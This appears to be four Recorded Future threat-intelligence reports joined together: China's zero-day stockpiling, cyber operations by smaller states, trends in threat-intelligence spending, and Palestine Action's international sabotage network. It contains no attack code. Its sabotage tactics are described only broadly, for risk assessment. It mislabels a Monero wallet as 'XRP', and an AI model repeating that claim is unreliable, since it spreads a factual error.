• The creation of the Information Support Force (ISF) and Cyberspace Force (CSF) signals China’s consolidation of cyber capabilities, likely enabling more effective offensive and defensive cyber operations, with vulnerabilities likely serving as a central resource.
• Defenders should adopt an “assume breach” posture and build for containment, implementing zero trust and layered defenses to limit attacker movement and impact after an exploit.

Figure 1: How China stockpiles vulnerabilities (Source: Recorded Future)

Analysis

Zero-Days as Strategic Weapons

A zero-day is a previously unknown software flaw for which no patch exists at the time it is discovered or exploited. Once weaponized, it allows adversaries to gain access, escalate privileges, or execute remote commands. These capabilities are especially effective against perimeter and enterprise systems, where a successful compromise can provide initial access and allow attackers to maintain persistence and carry out further cyber actions.

Choosing whether to disclose or keep a zero-day vulnerability is a strategic decision. Governments must balance public safety with the potential intelligence or military value of keeping the flaw secret. In the US, this process is guided by the Vulnerabilities Equities Process (VEP), which is designed to be transparent and generally favors disclosure to help maintain internet security.

China’s Vulnerability Management Regime

China’s vulnerability management system is centralized and led by the state. Its laws, incentives, and institutions work together to feed new exploits and technical capabilities directly to the government, turning software vulnerabilities into strategic assets under state control.

• Mandatory Reporting

The RMSV (2021) requires that all discovered vulnerabilities be reported to the Ministry of Industry and Information Technology (MIIT) within two days and prohibits disclosure to foreign entities. The Data Security Law (DSL) and National Intelligence Law (NIL) further compel all individuals and organizations to support state security objectives, with strict penalties for non-compliance. Together, these laws grant Beijing first access and complete control over all newly discovered flaws.

• Incentivizing Compliance

This legal framework is reinforced through financial and professional incentives. The China National Vulnerability Database of Information Security (CNNVD), managed by the Ministry of State Security (MSS), offers researchers and firms monetary rewards, certificates, honorary titles, and preferential access to government contracts. This system encourages compliance by making vulnerability disclosure both mandatory and materially rewarding.

• Talent Development and Recruitment Pipelines

China combines strict regulations with a well-organized system for developing cybersecurity talent. Competitions such as the Tianfu Cup, Matrix Cup, and QiangWang Cup serve as key recruitment and training platforms for the state’s cyber programs. The 2024 Matrix Cup’s $2.75 million USD prize pool, nearly twice that of Canada’s Pwn2Own, highlights the size of this investment.

• Private Sector Relationships
  
  China’s private sector also plays a pivotal role. Major firms such as Qi An Xin, Huawei, Qihoo 360, and NSFocus contribute vulnerabilities and technical expertise directly to the government. Large technology companies also fund or subcontract offensive work to smaller firms, creating a dense ecosystem of start-ups engaged in exploit research and hacking services. The i-SOON leaks (2023) revealed the scale and interconnectedness of this ecosystem: The company sold hack-for-hire services and targeting platforms to government customers while subcontracting work for Qi An Xin and Chengdu 404.

From Discovery to Deployment: Operationalizing China’s Vulnerability Pipeline

This centralized vulnerability ecosystem is producing measurable results, enabling Chinese state-sponsored groups to convert vulnerability discovery into operational access at a speed and scale far beyond that seen in other national programs. A clear manifestation of this is their sustained focus on enterprise and edge technologies, including Fortinet, VMware/ESXi, and Ivanti, where access is durable and often high-privileged, and detection is limited. In 2025, China-linked groups exploited Ivanti VPN and Trimble Cityworks (1, 2) flaws as part of a long-term strategy to remain undetected within networks, expand access, and position themselves for potential critical infrastructure disruption.

China continues to expand its network of CNNVD technical support units (TSUs) and related programs, increasing its overall research base. TSUs are specialized organizations, often universities, state-linked labs, and cybersecurity firms that directly feed vulnerability research and intelligence into the national system. Since 2021, the number of TSUs has increased significantly, broadening the state’s research capacity and deepening its ability to identify and operationalize software flaws at scale.

Figure 2: Number of new CNNVD TSUs by month, June 2021 to July 2025 (Source: Natto Thoughts)

Most vulnerability disclosures to affected vendors and the broader security community still originate from universities, labs, and cybersecurity firms associated with CNNVD, CNVD, and the expanding TSU network. However, even as the ecosystem grows, the overall volume of these disclosures continues to decline, indicating that a larger share of discoveries is now being routed internally rather than published. This suggests that more vulnerabilities are being withheld for state-directed use. Secrecy surrounding hacking competitions is also growing: The Tianfu Cup was not held publicly in 2024, and the 2024 Matrix Cup shared little to no details about discovered exploits. These competitions have historically been major sources of high-quality vulnerabilities, and reduced transparency further aligns with the shift away from open disclosure.

Together, these trends — the rapid expansion of TSUs, the decline in public vulnerability reporting, and the tightening secrecy around exploit-generation events — likely point to a deliberate state strategy that emphasizes centralized stockpiling and selective operational use of vulnerabilities rather than public disclosure.

Strategic Stockpiling and Selective Use

China’s reported use of zero-days declined from twelve in 2023 to five in 2024, and it is responsible for only ten of the 104 zero-day exploits identified globally so far in 2025. While this may partly reflect limited visibility into zero-day deployment and attribution, the trend may also suggest a more selective, strategic approach to when and how its zero-day capabilities are used.

Figure 3: Of the 104 zero-days identified in 2025, ten were attributed to Chinese state-sponsored threat actors (Source: Recorded Future)

Beijing’s control mechanisms under the RMSV and DSL enable it to selectively weaponize or withhold zero-days, preserving its most impactful capabilities for crises or strategic objectives. At the same time, n-day vulnerabilities — older but still unpatched flaws — remain highly effective due to inconsistent global patching.

Using these known flaws allows Chinese operators to gain access to networks and gather intelligence without revealing their zero-day exploits. Overall, this reflects a system designed for long-term preparedness rather than immediate gain.

Military Integration and Strategic Significance

China’s April 2024 military reforms introduced three new divisions within the People’s Liberation Army (PLA), including two centered on cyber and information security:

• The Information Support Force (ISF), which is responsible for the security and continuity of China’s military networks, data systems, and command infrastructure
• The Cyberspace Force (CSF), which is dedicated to both offensive and defensive cyber operations

Together, the two units consolidate China’s cyber and information capabilities, which were previously primarily nested under the PLA Strategic Support Force. These units form the backbone of its digital warfighting structure. The restructuring is likely to enhance Beijing’s ability to coordinate kinetic and cyber operations, with zero-days serving as key enablers and potential first-strike tools.

Figure 4: New structure of the People’s Liberation Army (PLA) (Source: The Jamestown Foundation)

The future use of zero-days will depend on how China decides to pursue its geostrategic goals, such as future unification with Taiwan. However, by compromising critical networks in advance, China can secure persistent access and deploy disruptive cyber effects alongside kinetic operations, as seen in Russia’s coordinated cyber-military campaigns in Ukraine. Chinese state-sponsored Volt Typhoon activity has been widely assessed as fulfilling such a purpose.

Outlook

• Increased Willingness to Use Zero-Days: As China reduces its reliance on US technology through its “Delete America” campaign, the cost of exploiting Western software will decrease, making zero-day use more attractive in future conflicts over the long term.
• Expanded Pre-Positioning: Expect continued infiltration of critical infrastructure and enterprise systems through both n-day and zero-day exploits to ensure durable wartime access.
• Increased N-day Use: The rapid adoption of AI-assisted coding and automation is accelerating the accumulation of software vulnerabilities. This expanding security debt — the accumulation of unpatched and unreviewed vulnerabilities — will give adversaries, including China, a broader and more persistent pool of n-day exploits to weaponize.
• Evolving Contractor Ecosystem: State-aligned private firms are likely to accelerate automation and AI-assisted vulnerability discovery, thereby expanding the Chinese state’s operational stockpile of viable exploits.

Mitigations

• Adopt an “Assume Breach” Posture: Implement zero-trust architectures that enforce identity and device verification at every access point. Use Recorded Future® Threat Intelligence to monitor for China-nexus infrastructure and malicious activity, feeding enriched indicators directly into security information and event management (SIEM) and security orchestration, automation, and response (SOAR) workflows.
• Prioritize Edge and Enterprise Patching: Focus remediation efforts on virtual private networks (VPNs), firewalls, hypervisors, and identity platforms most commonly targeted by China-nexus threat actors. Use Recorded Future Vulnerability Intelligence to track emerging zero-day and n-day threats, prioritize patching by exploitation risk, and validate remediation across critical systems.
• Detect Post-Exploitation Behavior: Use D3FEND mappings such as Process Access Pattern Analysis (D3-PAPA) and Remote Access Detection (D3-RAD) to identify stealthy follow-on actions. Combine these controls with Recorded Future Attack Surface Intelligence to identify exposed assets and verify that detection coverage extends to externally facing environments.
• Secure Identities and Access: Leverage Recorded Future Identity Intelligence to detect compromised credentials that may complement exploit-based intrusions.

Risk Scenario

EnerTech Global, a European energy technology firm providing control systems and smart grid software to multiple NATO-aligned countries, becomes the target of a Chinese state-sponsored cyber campaign. Using undisclosed zero-day vulnerabilities, Chinese operators infiltrate EnerTech’s production and customer environments to gather intelligence, manipulate software updates, and pre-position for potential disruption.

First-Order Implications

Chinese threat actors exploit a zero-day in a network management or VPN appliance to gain initial access to EnerTech’s internal systems and engineering networks.

A zero-day in industrial control or software build pipelines is used to insert malicious code into firmware updates distributed to downstream customers.

Organizational Risks:

• Operational: Compromise of development and production networks halts manufacturing and disrupts customer support operations.
• Legal: Breach of export-control and cybersecurity regulations triggers EU and US compliance investigations.
• Brand: Public confirmation of a “state-backed breach” undermines trust with government and defense customers dependent on EnerTech’s technology.

Second-Order Implications

Attackers use stolen code-signing certificates to distribute trojanized software updates to energy utilities across Europe. Collected intelligence on grid infrastructure is used to map potential disruption points for future contingency operations.

Organizational Risks:

• Operational: Some utilities begin to see irregularities in their operational technology (OT) environments, including unexpected behavior in grid-monitoring tools, delayed telemetry updates, and unexplained authentication failures on systems that rely on EnerTech software.
• Brand: EnerTech’s reputation deteriorates as customers and regulators question its software assurance and supply chain controls.
• Legal: Disclosure of tampered software triggers international incident response coordination and potential export-license suspension.

Third-Order Implications

Persistent access enables China to remotely sabotage or disable systems during a geopolitical crisis, thereby amplifying disruption across allied power grids. Stolen intellectual property is used by Chinese competitors to replicate EnerTech’s industrial software, undercutting global market bids.

Organizational Risks:

• Competitive: Loss of proprietary code and technology enables China-based competitors to dominate regional procurement markets.
• Brand: Association with a high-profile critical infrastructure breach erodes long-term credibility in both commercial and government sectors.
• Legal: Multinational investigations and sanctions create enduring compliance exposure and financial penalties.

Further Reading

• China-linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions
• Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group
• From Coercion to Invasion: The Theory and Execution of China’s Cyber Activity in Cross-Strait Relations
• China’s Ministry of State Security Likely Influences National Network Vulnerability Publications
• China’s new Information Support Force

Regional conflicts and weakened international institutions are driving the use of offensive cyber operations beyond the “Big Four” (China, Russia, Iran, and North Korea). Monitoring these threat actors requires organizations to proactively assess their geopolitical risk to understand where future threats are most likely to emerge.

In 2025, Recorded Future identified at least twenty actors across thirteen “non-Big Four” countries conducting cyber operations, primarily linked to regional conflicts, domestic surveillance, or foreign espionage.

Companies should closely monitor regional geopolitics and maintain strong continuity and resilience plans to protect against cyber espionage or disruptive cyberattacks.

Figure 1: Trends influencing how and why state-sponsored actors beyond China, Russia, Iran, and North Korea carry out cyber operations (Source: Recorded Future)

Analysis

Overview of Other State Sponsors of Cyber Operations

While the “Big Four” account for the majority of reported cyber threat activity, many other countries use cyber operations to advance their strategic interests. Recorded Future data shows that most observed activity outside of the “Big Four” stems from regional conflicts. Patriotic hacktivist groups, which advance state interests alongside state-sponsored espionage operations, represent the highest volume of reported activity. The degree of coordination between hacktivists and the government remains unclear and likely varies. However, their actions are included in this assessment because of their close alignment with state objectives, which means their activity correlates with interstate conflict risk.

Outside of active conflict, espionage against foreign and domestic targets continues to be a major driver of cyber operations. The most cyber-capable states invest heavily in avoiding detection and attribution, given the significant negative political consequences of exposure.

Tracking threat actors beyond the Big Four requires organizations to understand their geopolitical risk in order to anticipate where threats are most likely to emerge. Operating in certain regions or conflict zones likely increases the risk of cyber espionage or destructive attacks.

Regional Cyber Conflicts

Territorial disputes drove nearly two-thirds of observed cyber activity in 2025, according to Recorded Future data. Cyber operations focused on intelligence collection against government, defense, and other critical infrastructure. Hacktivists escalated their activity during conflicts, carrying out nuisance-level attacks amplified through influence operations. Like hacktivists, influence operations align closely with state interests during conflict, but have varying degrees of connection to the state. These activities rarely affect battlefield outcomes but are designed to signal technical sophistication or moral superiority over the adversary.

India and Pakistan

Between May 7 and 10, 2025, India and Pakistan exchanged a series of missile strikes — the most serious escalation between the two nuclear-armed countries in decades. Throughout the crisis, large volunteer hacktivist communities on both sides conducted disruptive attacks, primarily DDoS and website defacements. Pakistan-linked APT36 conducted espionage operations targeting the Indian government and other politically motivated targets, while threat actors linked to the Indian government, such as SideWinder, pursued Pakistani military targets.

Figure 2: Cyber activity between India and Pakistan spiked alongside the outbreak of armed conflict in May 2025 (Source: Recorded Future)

Influence operations intended to shape perceptions of the conflict also intensified. Influence networks amplified hacktivist claims, often overstating their impact, such as widespread reporting on Pakistani social media that hackers had shut down 70% of India’s electric grid. These operations are intended to portray their own side as more capable and their adversary as vulnerable, underscoring the importance of narrative control in conjunction with military operations.

Thailand and Cambodia

Similar to cyber engagements observed between India and Pakistan, hacktivist operations bolstered by influence campaigns significantly escalated between Thai hackers and Cambodian hackers following the May 2025 conflict. These were largely carried out by self-proclaimed patriotic hacktivist groups. Operations included DDoS attacks, website defacements, and data leak operations. More targeted hack-and-leak operations were also intended to reveal politically damaging information about the other country’s leadership. Influence operation narratives emphasized that the opposing side was the aggressor in the conflict, likely in order to garner both domestic and international support.

Morocco and Algeria

While tensions between Morocco and Algeria have not escalated into armed conflict, cyber hostilities increased significantly in 2025. In the context of these tensions, pro-Algerian hacktivists have allegedly carried out a series of high-profile attacks on Moroccan institutions, striking the National Social Security Fund, the National Agency for Land Conservation, and the Ministry of Justice. The hackers, going by JabaROOT, leaked personal and financial data of millions of Moroccan citizens, potentially exacerbating existing domestic tensions over income disparity. The cyberattacks may have been intended to demonstrate Moroccan vulnerability while maintaining a level of deniability for the Algerian government. Moroccan hacktivists responded with retaliatory data breaches against the Algerian government and education institutions.

Espionage Operations Outside of Armed Conflict

While many more countries almost certainly engage in cyber espionage, the following threat actors have been tracked attempting to collect information on targets of political significance:

• While India-linked threat actors such as SideWinder and Bitter have traditionally targeted neighbors like Pakistan, Sri Lanka, and Bangladesh, espionage against European diplomatic entities increased significantly in 2024, demonstrating a broader targeting scope.
• Vietnam has accelerated its development of cyber capabilities. APT32, likely linked to the Vietnamese government, has carried out operations against Chinese cybersecurity researchers as well as against internal dissidents. In the past, this group has also targeted car manufacturers, foreign governments, and others, driven by geopolitical and economic priorities.
• At least two threat actor groups observed conducting espionage operations have been linked to Türkiye: Marbled Dust and StrongPity, who prioritize regional and domestic targets. In addition, a robust online community of patriotic hacktivists targets regional and international adversaries, whether historical (such as Armenia and Greece) or in modern disputes (France and Germany).
• Stealth Falcon, linked to the United Arab Emirates, has been observed exploiting a zero-day vulnerability to target a Turkish defense organization. The group has been active since at least 2016, targeting government and defense organizations primarily in the Middle East and Africa.

Political and diplomatic priorities make intelligence targets predictable. Organizations should assess not only their regional exposure but also whether their industry aligns with strategic priorities, as sectors tied to national strategy are the most likely targets for espionage.

Domestic Surveillance Activity

Many states use their cyber capabilities to monitor domestic security concerns, which can include law enforcement or national security priorities, monitoring political opposition, or conducting economic espionage on behalf of a key national industry. Domestic surveillance capabilities are often supplemented with commercial off-the-shelf spyware, such as Intellexa’s Predator or Candiru’s DevilsTongue. Similar to understanding political priorities for cross-border espionage, companies should assess whether they possess data that may be of political significance to the government of a country in which they operate. States that lack sufficient oversight or legal privacy protections pose an increased risk of intrusive cyber monitoring and surveillance.

Figure 3: (Left) Graphical representation from the Insikt Group report titled Dark Covenant of the direct and indirect links between Russian Intelligence Services and individuals in the Russian cybercriminal underground; (Right) Infographic of reported cyberattack by Russian state-backed ransomware operators against German military contractors

(Source: Recorded Future)

Outlook

• Cyberattacks are likely to increase as international alliances weaken: The Thailand-Cambodia and India-Pakistan conflicts demonstrate an increased willingness to use force to pursue regional goals. Deployments in multilateral peacekeeping operations decreased by 40% over the last decade, likely due to challenges in generating the necessary support for intervention. This makes it more likely that states will turn to violence to resolve disputes, as opposed to non-violent negotiations. Cyber and influence operations are becoming increasingly common features in these conflicts, serving as a low-cost means of signaling strength, shaping narratives, and imposing limited disruption.
• Cyber capability build-up may follow conventional military build-up: NATO countries in Europe, as well as South Korea and Japan, are increasing their military spending. While many of these countries already have advanced cyber capabilities, they may seek to invest in more sophisticated offensive capabilities to augment conventional forces. Legal and doctrinal changes, such as in Japan and South Korea, are also laying the groundwork for a shift from a defensive cyber policy to an offensive posture.
• Commercial cyber capabilities may be sought for interstate conflict: Countries seeking to gain a cyber advantage in advance of a regional conflict may turn to commercial offensive tools, similar to the growing reliance on these tools for internal law enforcement or counterterrorism operations. This reduces the barrier to entry for smaller or less technically mature states, enabling more actors to conduct sophisticated intrusions, targeted espionage, and high-impact disruption.

Mitigations

• Use Recorded Future’s Geopolitical Intelligence to monitor regional conflicts and geopolitical developments for risks to international and outsourced operations.
• Use Recorded Future’s Threat Intelligence to track threat actor groups and detect TTPs associated with non-Big Four countries.
• Understand the risk of surveillance for personnel traveling to high-risk countries and take mitigating actions such as using alternative devices. Use Recorded Future’s Country Risk Data in the Geopolitical Intelligence module to assess surveillance and other travel risks.
• Ensure continuity-of-operations plans are in place to mitigate the impacts of disruptive or destructive attacks. Use Recorded Future Analyst-on-Demand for bespoke research on how your organization might be targeted.

Figure 4: Starting with these four questions can help you understand threat actors’ motivations for targeting your organization (Source: Recorded Future)

Risk Scenario

A longstanding territorial dispute between Country A and Country B erupts into a military skirmish at the border, with risks of further escalation. Country A is home to a robust business process outsourcing industry serving some of the world’s largest international corporations.

First-Order Implications

Groups claiming to be patriotic hacktivists from both countries conduct hack-and-leak operations and website defacements. These are amplified by partisans on social media who often exaggerate the impact of these attacks.

• Competitive disadvantage: Hack-and-leak operations expose sensitive internal documents, including proprietary trade secrets and embarrassing communications.
• Increased surveillance risk: The conflict increases domestic surveillance activity in Country B to monitor for internal threats. International employees traveling to Country B are subject to enhanced surveillance.

Second-Order Implications

Actors claiming to be hacktivists supporting Country A escalate cyber operations, carrying out persistent cyberattacks against Country B’s electrical grid. As a result, Country B experiences rolling blackouts in the capital city.

• Operational disruption: The blackouts prevent call centers from performing essential business functions, resulting in significant service delays and revenue losses for corporations worldwide.
• Physical security risk: Anger over blackouts increases public support for escalating operations against Country A. The escalation of conflict increases the risk of harm to employees or the destruction of facilities.

Third-Order Implications

The United States and China become increasingly involved in the conflict between Country A and Country B, providing military, logistical, and cyber capabilities to their preferred country. The external support prolongs the conflict and increases the risk of involving neighboring countries.

• Conflict escalation: With more weapons and logistical support from great power backers, fighting between Country A and Country B expands from the border to strikes further in the interior. Both military and civilian casualties increase as violence escalates.
• Regional economic impact: Extended disruptions may cause international corporations to move operations to more stable regions, leading to a negative economic impact in the region.

Further Reading

• Influence Operations and Conflict Escalation in South Asia
• New APT32 Malware Campaign Targets Cambodian Government
• From Pegasus to Pall Mall: Managing Risks of Offensive Cyber Capabilities
• Current Trends in the Turkish Language Dark Web

The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.

The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s 2025 State of Threat Intelligence Report found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.

This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.

Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.

Key Trends Driving Threat Intelligence Evolution

There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.

• Vendor Consolidation for Unified Intelligence: Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.
• Deeper Integration into Security Workflows: Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.
• Automation and AI Augmentation: To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.
• Fusion of Internal and External Data: Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).

Challenges Holding Team Backs Today

Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.

• Integration Gaps: Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.
• Credibility and Trust Issues: Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.
• Signal-to-Noise Overload: With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.
• Lack of Context for Action: Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.

These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.

Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned

In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).

Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.

Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.

Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.

Implications for 2026 Security Budgets and Investments

As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.

One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.

Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.

Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.

That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.

Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.

Charting the Course to 2026

Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.

By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.

So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like Recorded Future’s Threat Intelligence Maturity Assessment provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.

With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.

Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.

Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.

Key Findings

• Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.
• Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.
• The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.
• The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.
• In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.

Palestine Action: History and Terrorism Designation

Palestine Action was founded in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. The almost certain core purpose of Palestine Action is to promote militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has focused its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function in the form of decentralized activist cells.

Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Assessment Center (JTAC) reported that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”

The frequency and scope of Palestine Action’s operations in the UK almost certainly increased following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. Figure 1 (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.

Figure 1: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)

The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, operation in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack caused over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper announced the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially designated a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising, or expressing support for Palestine Action, with legal penalties as severe as fourteen years in prison for being convicted of being a Palestine Action member.

Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally challenge the ban and garner public support for its cause through a series of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.

However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (Figure 2) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XRP) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”

Figure 2: Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)

